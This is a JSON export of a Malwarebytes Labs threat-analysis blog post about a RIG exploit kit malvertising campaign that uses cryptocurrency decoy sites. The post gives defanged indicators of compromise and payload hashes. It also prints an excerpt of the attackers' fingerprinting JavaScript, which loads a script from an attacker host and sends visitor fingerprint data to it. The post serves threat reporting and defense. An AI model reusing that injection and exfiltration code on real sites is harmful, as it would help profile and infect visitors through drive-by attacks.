{"id":11624,"date":"2018-02-28T17:10:04","date_gmt":"2018-03-01T01:10:04","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/02\/28\/news-5395\/"},"modified":"2018-02-28T17:10:04","modified_gmt":"2018-03-01T01:10:04","slug":"news-5395","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2018\/02\/28\/news-5395\/","title":{"rendered":"RIG malvertising campaign uses cryptocurrency theme as decoy"},"content":{"rendered":"<p><strong>Credit to Author: J\u00e9r\u00f4me Segura | Date: Wed, 28 Feb 2018 16:45:10 +0000<\/strong><\/p>\n<p>For a couple of weeks, we have been observing a malvertising campaign that uses decoy websites to redirect users to the RIG exploit kit. Those sites, whose theme is cryptocurrencies, were all registered recently and are swapped out after a few days of use.<\/p>\n<p>The chain starts with a malvertising redirect, which loads the decoy page containing a third-party JavaScript. That JavaScript appears to be loaded conditionally, based on the visitor&#8217;s user agent and geolocation.<\/p>\n<p><img src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/fingerprinting_call.png\" alt=\"fingerprinting_call\" width=\"722\" height=\"669\" \/><\/p>\n<p>The JavaScript contains many different ways to fingerprint visitors and decide whether they are legitimate, using checks such as:<\/p>\n<ul>\n<li>getHasLiedLanguages<\/li>\n<li>getHasLiedResolution<\/li>\n<li>getHasLiedOS<\/li>\n<li>getHasLiedBrowser<\/li>\n<\/ul>\n<p>The results are then sent back to the server with the following code snippet (excerpt):<\/p>\n<pre>\/\/botDetect.onUser(function () {\n  var fp = new Fingerprint2();\n  fp.get(function(result, components) {\n    var head = document.head || document.getElementsByTagName('head')[0];\n    var script = document.createElement('script');\n    script.type = 'text\/javascript';\n    script.src = 'http:\/\/binaryrobotplus[.]top\/rrr\/' + result;\n    head.appendChild(script);\n    iframePost('http:\/\/binaryrobotplus[.]top\/logs\/fff', {\n      fingerprintjs: JSON.stringify(components)\n    });<\/pre>\n<p>The final step is a response containing an iframe to RIG EK:<\/p>\n<p><img src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/iframe_RIG.png\" alt=\"iframe_RIG\" width=\"789\" height=\"132\" \/><\/p>\n<h3>Quiet campaign<\/h3>\n<p>So far, we have not collected many hits via this campaign. 
Because it was new to us, we decided to call it Coins LTD, based on the numerous references to cryptocurrencies in the decoy page.<\/p>\n<p>[Update] This campaign is also tracked as &#8216;etags&#8217;.<\/p>\n<pre>privateadult4you[.]club\/\n  -&gt; airmapanalytics[.]top\/iframe\/mapss.js\n  -&gt; ashlemainstreammm[.]club\/?q=w3_QMvXcJx7QFY{truncated}\n\nUndocumented Injection (Stage 1) fake dating site\n  -&gt; privateadult4you[.]club 212.237.23[.]174\nEtags Malicious Redirector (Stage 2)\n  -&gt; airmapanalytics[.]top 212.237.5[.]244\nRIG EK Landing Page\n  -&gt; ashlemainstreammm[.]club 109.236.83[.]87\nRIG EK Flash Object\n  -&gt; 185.158.112[.]49 RIG EK Flash Object\n\n212.237.23[.]174 AS31034 | IT | ARUBA-ASN\n212.237.5[.]244 AS31034 | IT | ARUBA-ASN\n109.236.83[.]87 AS49981 | NL | WORLDSTREAM\n185.158.112[.]49 AS44812 | UA | IPSERVER-RU-NET\n\n## Response Headers for Etags - airmapanalytics[.]top\nX-Powered-By Express\nContent-Type application\/javascript; charset=utf-8\nContent-Length 332\nETag W\/\"14c-SUotFKLILwhh6umKmaC23SYcKJA\"\nDate Mon, 08 May 2017 16:42:39 GMT\nConnection keep-alive<\/pre>\n<p>Thanks to\u00a0<a href=\"https:\/\/twitter.com\/anti_expl0it\" target=\"_blank\" rel=\"noopener\">@anti_expl0it<\/a>\u00a0for the additional data.<\/p>\n<p>The infection chain is identical from one case to the next, and so far we have collected only two kinds of payloads: TrickBot and Ramnit.<\/p>\n<p><img src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/traffic.png\" alt=\"traffic\" width=\"732\" height=\"323\" \/><\/p>\n<p>Other researchers, such as <a href=\"https:\/\/twitter.com\/baberpervez2\/status\/968849891442282501\" target=\"_blank\" rel=\"noopener\">Baber Pervez<\/a>, have caught this redirection chain as well, which recently slightly changed its URI pattern. 
However, the same\u00a0primary domain and secondary (JS fingerprinting) domain have been rotating and are hosted on two distinct IP addresses, as shown in the diagram below:<\/p>\n<p><img src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/diagram_.png\" alt=\"diagram_\" width=\"890\" height=\"532\" \/><\/p>\n<p>This is one of a handful of malvertising campaigns that we have been tracking. It&#8217;s worth noting that it also uses similar filtering steps to avoid bots, and that it relies on a\u00a0<a href=\"http:\/\/www.nao-sec.org\/2017\/12\/survey-of-ngay-campaign.html\" target=\"_blank\" rel=\"noopener\">decoy gate<\/a>, which seems to be a common practice these days.<\/p>\n<p>We will keep tabs on this campaign\u2014in particular on what payloads it drops in the future. <a href=\"http:\/\/www.malwarebytes.com\/pricing\" target=\"_blank\" rel=\"noopener\">Malwarebytes<\/a> users are protected from this drive-by attack.<\/p>\n<h3>Indicators of compromise<\/h3>\n<p>IPs<\/p>\n<pre>5.135.234[.]116\n212.237.12[.]253\n137.74.159[.]216<\/pre>\n<p>TrickBot<\/p>\n<pre>30de0e16924dddd4f162a25bbecb7f7ebc67a141140a245272a24951d0e81e1c<\/pre>\n<p>Ramnit<\/p>\n<pre>83dbde1705aa434e4c6cdae6a7d689abc4ad14ffcac26a10dbb5e96238d5b8e7<\/pre>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/02\/new-rig-malvertising-campaign-uses-cryptocurrency-theme-decoy\/\">RIG malvertising campaign uses cryptocurrency theme as decoy<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: J\u00e9r\u00f4me Segura | Date: Wed, 28 Feb 2018 16:45:10 +0000<\/strong><\/p>\n<table cellpadding='10'>\n<tr>\n<td valign='top' 
align='center'><a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/02\/new-rig-malvertising-campaign-uses-cryptocurrency-theme-decoy\/' title='RIG malvertising campaign uses cryptocurrency theme as decoy'><img src='https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/shutterstock_683817304.jpg' border='0'  width='300px'  \/><\/a><\/td>\n<\/tr>\n<tr>\n<td valign='top' align='left'>This malvertising campaign uses a popular cryptocurrency theme to redirect users to the RIG exploit kit.<\/p>\n<p>Categories: <\/p>\n<ul class=\"post-categories\">\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/exploits-threat-analysis\/\" rel=\"category tag\">Exploits<\/a><\/li>\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/\" rel=\"category tag\">Threat analysis<\/a><\/li>\n<\/ul>\n<p>Tags: <a href=\"https:\/\/blog.malwarebytes.com\/tag\/cryptocurrencies\/\" rel=\"tag\">cryptocurrencies<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/malvertising\/\" rel=\"tag\">malvertising<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/rig\/\" rel=\"tag\">RIG<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/rigek\/\" rel=\"tag\">RIGEK<\/a><\/p>\n<table width='100%'>\n<tr>\n<td align=right>\n<p><b>(<a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/02\/new-rig-malvertising-campaign-uses-cryptocurrency-theme-decoy\/' title='RIG malvertising campaign uses cryptocurrency theme as decoy'>Read more&#8230;<\/a>)<\/b><\/p>\n<\/td>\n<\/tr>\n<\/table>\n<\/td>\n<\/tr>\n<\/table>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/02\/new-rig-malvertising-campaign-uses-cryptocurrency-theme-decoy\/\">RIG malvertising campaign uses cryptocurrency theme as decoy<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes 
Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[14147,10987,10531,11589,11692,10494],"class_list":["post-11624","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-cryptocurrencies","tag-exploits","tag-malvertising","tag-rig","tag-rigek","tag-threat-analysis"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11624","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=11624"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11624\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=11624"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=11624"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=11624"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}